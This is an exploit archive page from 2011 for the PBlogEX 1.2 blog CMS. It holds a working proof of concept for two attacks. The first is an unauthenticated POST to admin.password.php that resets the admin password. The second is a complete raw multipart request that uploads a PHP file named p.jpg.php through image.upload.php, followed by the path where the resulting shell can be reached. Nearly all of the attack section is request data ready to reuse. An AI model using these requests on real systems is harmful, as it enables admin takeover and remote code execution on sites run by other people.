exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PBlogEX 1.2 Shell Upload

PBlogEX 1.2 Shell Upload
Posted Mar 5, 2011
Authored by l3lack_lord | Site mokhareb.net

PBlogEX version 1.2 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 2972818b94aa02b80d9f73313b212f8b50c5f576e6a7312659f54e76d7b1c144
Download | Favorite | View

PBlogEX 1.2 Shell Upload

Change Mirror Download
# PBlogEX v1.2 Multiply Vulnerabilities

# vendor: http://www.twelvedev.com/
# By l3lack_lord
# WwW.Mokhareb.NeT
# Demo: http://f-ochoa.com/
# Tested On: Apache/2.2.9 - PHP/5.2.6
# Date: 2011/03/4

# Des:
# The Admin Password Change Not Authoritated for execute

# POC:
http://Site.com/PBlogEX/admin/admin.password.php
[POST]user=1&password=l3lack_lord

Now Password Will change to l3lack_lord
http://Site.com/PBlogEX/admin
u should gess admin user :)

#################################################################

# Des:
# Remote Shell uplode possible on this cms with no authetication in image.upload.php

# POC:
http://Site.com/PBlogEX/admin/image.upload.php
[POST]
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://Site.com/PBlogEX/admin/admin.php
Content-Type: multipart/form-data; boundary=---------------------------225932708016080
Content-Length: 5775

-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="filephoto"; filename="p.jpg.php"\r\n
Content-Type: image/jpeg\r\n
\r\n
<?php\r\n
phpinfo();\r\n
?>\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="titlephoto"\r\n
\r\n
aaa\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="descphoto"\r\n
\r\n
aaa\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="Default1"\r\n
\r\n
on\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="0"\r\n
\r\n
f\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="1"\r\n
\r\n
i\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="2"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="3"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="4"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="5"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="6"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="7"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="8"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="9"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="10"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="11"\r\n
\r\n
.\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="12"\r\n
\r\n
j\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="13"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="14"\r\n
\r\n
g\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="15"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="16"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="17"\r\n
\r\n
i\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="18"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="19"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="20"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="21"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="22"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="23"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="24"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="25"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="26"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="27"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="28"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="29"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="30"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="31"\r\n
\r\n
d\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="32"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="33"\r\n
\r\n
s\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="34"\r\n
\r\n
c\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="35"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="36"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="37"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="38"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="39"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="40"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="41"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="42"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="43"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="44"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="45"\r\n
\r\n
D\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="46"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="47"\r\n
\r\n
f\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="48"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="49"\r\n
\r\n
u\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="50"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="51"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="52"\r\n
\r\n
1\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="53"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="54"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="55"\r\n
\r\n
n\r\n
-----------------------------225932708016080--\r\n


copy file name in error that will print..like 2011-03-02_7032_p.jpg.php
Shell Path :
http://Site.com/PBlogEX/images/2011-03-02_7032_p.jpg.php


# Virangar Security Team , DeltaHacking TEam , Aria-Security
# tnX t0 mY cronies Hares And Netw0rm :-*


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close